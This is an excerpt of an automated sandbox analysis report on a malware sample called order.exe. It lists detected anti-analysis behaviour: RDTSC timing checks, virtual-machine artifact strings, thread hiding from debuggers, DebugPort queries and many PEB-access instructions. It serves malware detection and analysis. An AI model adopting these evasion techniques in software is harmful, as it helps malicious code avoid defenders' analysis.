      Source: C:\Users\user\Desktop\order.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000007A98E4 second address: 00000000007A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000007A9B5E second address: 00000000007A9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02287738 rdtsc 0_2_02287738
      Source: C:\Users\user\Desktop\order.exe TID: 5184Thread sleep count: 186 > 30Jump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000010.00000000.399402456.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000010.00000000.399402456.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000010.00000002.519599048.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000010.00000000.399663925.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000010.00000000.399663925.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
      Source: explorer.exe, 00000010.00000000.391821194.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000010.00000002.520456319.00000000068B8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWe_%SystemRoot%\system32\mswsock.dll
      Source: explorer.exe, 00000010.00000000.399663925.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
      Source: explorer.exe, 00000010.00000000.399496745.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
      Source: explorer.exe, 00000010.00000000.399496745.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000010.00000000.396640200.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
      Source: explorer.exe, 00000010.00000000.376117915.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
      Source: explorer.exe, 00000010.00000002.519599048.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: order.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000010.00000002.519599048.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000010.00000002.519599048.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\order.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02287738 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?0_2_02287738
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\order.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\order.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\order.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\order.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\order.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\order.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02287738 rdtsc 0_2_02287738
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02284CF3 LdrInitializeThunk,0_2_02284CF3
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02286E81 mov eax, dword ptr fs:[00000030h]0_2_02286E81
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022885C3 mov eax, dword ptr fs:[00000030h]0_2_022885C3
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02288633 mov eax, dword ptr fs:[00000030h]0_2_02288633
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02288603 mov eax, dword ptr fs:[00000030h]0_2_02288603
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_0228865F mov eax, dword ptr fs:[00000030h]0_2_0228865F
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_0228868A mov eax, dword ptr fs:[00000030h]0_2_0228868A
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02286E83 mov eax, dword ptr fs:[00000030h]0_2_02286E83
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022886CA mov eax, dword ptr fs:[00000030h]0_2_022886CA
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02288323 mov eax, dword ptr fs:[00000030h]0_2_02288323
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022843B0 mov eax, dword ptr fs:[00000030h]0_2_022843B0
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283067 mov eax, dword ptr fs:[00000030h]0_2_02283067
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02287879 mov eax, dword ptr fs:[00000030h]0_2_02287879
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02282CED mov eax, dword ptr fs:[00000030h]0_2_02282CED
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022830CA mov eax, dword ptr fs:[00000030h]0_2_022830CA
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_0228252E mov eax, dword ptr fs:[00000030h]0_2_0228252E
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02282D18 mov eax, dword ptr fs:[00000030h]0_2_02282D18
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022885C8 mov eax, dword ptr fs:[00000030h]0_2_022885C8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46AE44 mov eax, dword ptr fs:[00000030h]12_2_1E46AE44
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46AE44 mov eax, dword ptr fs:[00000030h]12_2_1E46AE44
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AE620 mov eax, dword ptr fs:[00000030h]12_2_1E3AE620
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DA61C mov eax, dword ptr fs:[00000030h]12_2_1E3DA61C
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DA61C mov eax, dword ptr fs:[00000030h]12_2_1E3DA61C
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AC600 mov eax, dword ptr fs:[00000030h]12_2_1E3AC600
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AC600 mov eax, dword ptr fs:[00000030h]12_2_1E3AC600
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AC600 mov eax, dword ptr fs:[00000030h]12_2_1E3AC600
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]12_2_1E3D8E00
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461608 mov eax, dword ptr fs:[00000030h]12_2_1E461608
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]12_2_1E3CAE73
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]12_2_1E3CAE73
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]12_2_1E3CAE73
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]12_2_1E3CAE73
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]12_2_1E3CAE73
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B766D mov eax, dword ptr fs:[00000030h]12_2_1E3B766D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E45FE3F mov eax, dword ptr fs:[00000030h]12_2_1E45FE3F
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]12_2_1E3B7E41
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]12_2_1E3B7E41
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]12_2_1E3B7E41
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]12_2_1E3B7E41
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]12_2_1E3B7E41
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]12_2_1E3B7E41
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]12_2_1E45FEC0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E478ED6 mov eax, dword ptr fs:[00000030h]12_2_1E478ED6
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43FE87 mov eax, dword ptr fs:[00000030h]12_2_1E43FE87
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]12_2_1E3B76E2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]12_2_1E3D16E0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E470EA5 mov eax, dword ptr fs:[00000030h]12_2_1E470EA5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E470EA5 mov eax, dword ptr fs:[00000030h]12_2_1E470EA5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E470EA5 mov eax, dword ptr fs:[00000030h]12_2_1E470EA5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4246A7 mov eax, dword ptr fs:[00000030h]12_2_1E4246A7
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D36CC mov eax, dword ptr fs:[00000030h]12_2_1E3D36CC
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]12_2_1E3E8EC7
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DE730 mov eax, dword ptr fs:[00000030h]12_2_1E3DE730
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]12_2_1E3A4F2E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]12_2_1E3A4F2E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CF716 mov eax, dword ptr fs:[00000030h]12_2_1E3CF716
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E478F6A mov eax, dword ptr fs:[00000030h]12_2_1E478F6A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DA70E mov eax, dword ptr fs:[00000030h]12_2_1E3DA70E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DA70E mov eax, dword ptr fs:[00000030h]12_2_1E3DA70E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E47070D mov eax, dword ptr fs:[00000030h]12_2_1E47070D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E47070D mov eax, dword ptr fs:[00000030h]12_2_1E47070D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43FF10 mov eax, dword ptr fs:[00000030h]12_2_1E43FF10
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43FF10 mov eax, dword ptr fs:[00000030h]12_2_1E43FF10
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]12_2_1E3BFF60
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]12_2_1E3BEF40
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B8794 mov eax, dword ptr fs:[00000030h]12_2_1E3B8794
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]12_2_1E3E37F5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E427794 mov eax, dword ptr fs:[00000030h]12_2_1E427794
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E427794 mov eax, dword ptr fs:[00000030h]12_2_1E427794
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E427794 mov eax, dword ptr fs:[00000030h]12_2_1E427794
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]12_2_1E3DBC2C
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43C450 mov eax, dword ptr fs:[00000030h]12_2_1E43C450
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43C450 mov eax, dword ptr fs:[00000030h]12_2_1E43C450
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E461C06 mov eax, dword ptr fs:[00000030h]12_2_1E461C06
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426C0A mov eax, dword ptr fs:[00000030h]12_2_1E426C0A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426C0A mov eax, dword ptr fs:[00000030h]12_2_1E426C0A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426C0A mov eax, dword ptr fs:[00000030h]12_2_1E426C0A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426C0A mov eax, dword ptr fs:[00000030h]12_2_1E426C0A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E47740D mov eax, dword ptr fs:[00000030h]12_2_1E47740D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E47740D mov eax, dword ptr fs:[00000030h]12_2_1E47740D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E47740D mov eax, dword ptr fs:[00000030h]12_2_1E47740D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C746D mov eax, dword ptr fs:[00000030h]12_2_1E3C746D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DA44B mov eax, dword ptr fs:[00000030h]12_2_1E3DA44B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E478CD6 mov eax, dword ptr fs:[00000030h]12_2_1E478CD6
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B849B mov eax, dword ptr fs:[00000030h]12_2_1E3B849B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426CF0 mov eax, dword ptr fs:[00000030h]12_2_1E426CF0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426CF0 mov eax, dword ptr fs:[00000030h]12_2_1E426CF0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426CF0 mov eax, dword ptr fs:[00000030h]12_2_1E426CF0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4614FB mov eax, dword ptr fs:[00000030h]12_2_1E4614FB
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E423540 mov eax, dword ptr fs:[00000030h]12_2_1E423540
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E453D40 mov eax, dword ptr fs:[00000030h]12_2_1E453D40
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]12_2_1E3D4D3B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]12_2_1E3D4D3B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]12_2_1E3D4D3B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]12_2_1E3AAD30
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]12_2_1E3B3D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CC577 mov eax, dword ptr fs:[00000030h]12_2_1E3CC577
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CC577 mov eax, dword ptr fs:[00000030h]12_2_1E3CC577
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]12_2_1E3C7D50
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E478D34 mov eax, dword ptr fs:[00000030h]12_2_1E478D34
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E42A537 mov eax, dword ptr fs:[00000030h]12_2_1E42A537
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]12_2_1E3E3D43
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46E539 mov eax, dword ptr fs:[00000030h]12_2_1E46E539
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]12_2_1E3D1DB5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]12_2_1E3D1DB5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]12_2_1E3D1DB5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426DC9 mov eax, dword ptr fs:[00000030h]12_2_1E426DC9
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426DC9 mov eax, dword ptr fs:[00000030h]12_2_1E426DC9
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426DC9 mov eax, dword ptr fs:[00000030h]12_2_1E426DC9
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]12_2_1E426DC9
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426DC9 mov eax, dword ptr fs:[00000030h]12_2_1E426DC9
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E426DC9 mov eax, dword ptr fs:[00000030h]12_2_1E426DC9
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]12_2_1E3D35A1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]12_2_1E46FDE2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]12_2_1E46FDE2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]12_2_1E46FDE2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]12_2_1E46FDE2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]12_2_1E3DFD9B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]12_2_1E3DFD9B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]12_2_1E3A2D8A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]12_2_1E3A2D8A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]12_2_1E3A2D8A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]12_2_1E3A2D8A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]12_2_1E3A2D8A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E458DF1 mov eax, dword ptr fs:[00000030h]12_2_1E458DF1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2581 mov eax, dword ptr fs:[00000030h]12_2_1E3D2581
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2581 mov eax, dword ptr fs:[00000030h]12_2_1E3D2581
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2581 mov eax, dword ptr fs:[00000030h]12_2_1E3D2581
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2581 mov eax, dword ptr fs:[00000030h]12_2_1E3D2581
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]12_2_1E3BD5E0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]12_2_1E3BD5E0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4705AC mov eax, dword ptr fs:[00000030h]12_2_1E4705AC
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4705AC mov eax, dword ptr fs:[00000030h]12_2_1E4705AC
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]12_2_1E3E4A2C
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]12_2_1E3E4A2C
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46EA55 mov eax, dword ptr fs:[00000030h]12_2_1E46EA55
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E434257 mov eax, dword ptr fs:[00000030h]12_2_1E434257
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA229 mov eax, dword ptr fs:[00000030h]12_2_1E3CA229
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]12_2_1E3C3A1C
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E45B260 mov eax, dword ptr fs:[00000030h]12_2_1E45B260
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E45B260 mov eax, dword ptr fs:[00000030h]12_2_1E45B260
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E478A62 mov eax, dword ptr fs:[00000030h]12_2_1E478A62
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A5210 mov eax, dword ptr fs:[00000030h]12_2_1E3A5210
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]12_2_1E3A5210
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A5210 mov eax, dword ptr fs:[00000030h]12_2_1E3A5210
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A5210 mov eax, dword ptr fs:[00000030h]12_2_1E3A5210
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]12_2_1E3AAA16
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]12_2_1E3AAA16
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]12_2_1E3B8A0A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E927A mov eax, dword ptr fs:[00000030h]12_2_1E3E927A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46AA16 mov eax, dword ptr fs:[00000030h]12_2_1E46AA16
